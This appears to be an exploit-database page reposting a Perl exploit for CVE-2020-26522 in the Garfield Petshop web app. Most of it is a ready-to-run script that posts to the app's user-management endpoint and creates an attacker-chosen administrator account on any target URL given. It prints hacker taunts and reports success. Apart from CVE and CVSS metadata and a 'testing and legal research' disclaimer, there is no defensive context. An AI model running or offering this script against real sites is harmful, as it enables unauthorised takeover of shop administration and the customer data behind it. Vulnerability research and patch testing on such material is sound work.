Advertisement






Garfield Petshop 2020-10-01 Cross Site Request Forgery

CVE Category Price Severity
CVE-2020-26522 CWE-352 $500 High
Author Risk Exploitation Type Date
Anonymous High Remote 2020-10-09
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020100061

Below is a copy:

Garfield Petshop 2020-10-01 Cross Site Request Forgery
#!/usr/bin/perl

# Garfield Petshop (Add-Admin) Exploit
# By Ramdan Yantu rysec.io \ bastardlabs.info
# From Gorontalo - Indonesia
# Mail: ramdanyantu__at__gmail.com
# Application by Gamma Advertisa
# Link: https://detapos.co/ | https://demo.detapos.co.id/petshop
# CVE: CVE-2020-26522

use strict;
use warnings;
use LWP::UserAgent;

my ($url, $path, $usernm, $passwd) = @ARGV ;

unless($ARGV[3]){
print "\n-+--[   Brought to you by Ramdan Yantu   ]--+-\n";
print "-+--     rysec.io / bastardlabs.info      --+-\n";
print "-+--[ Garfield Petshop Add-Admin Exploit ]--+-\n";
print "\nUsage:\n\n";
print "perl $0 [target] [path] [username] [password]\n";
print "ex: perl $0 http://target.com /petshop/ w00t w00t\n";
exit ();
}

my $ua = LWP::UserAgent->new( agent => "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1)" );
my $ob = $ua->post( $url.$path."/mod/user/act_user.php?mod=user&act=simpan", { 
"nama_lengkap"   => "u h4V3 833n 0wN3D", "usernm"   => $usernm,
"passwd"   => $passwd, "rpasswd"   => $passwd, "level"   => "admin" } );
if($ob->is_success != -1) {
    print "\n [+] splo!it successfully!\n".
  "\n username: $usernm\n".
  " password: $passwd\n";

}else{
    print "[-] splo!t failed! Maybe ente kurang tamvan!\n";
}

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum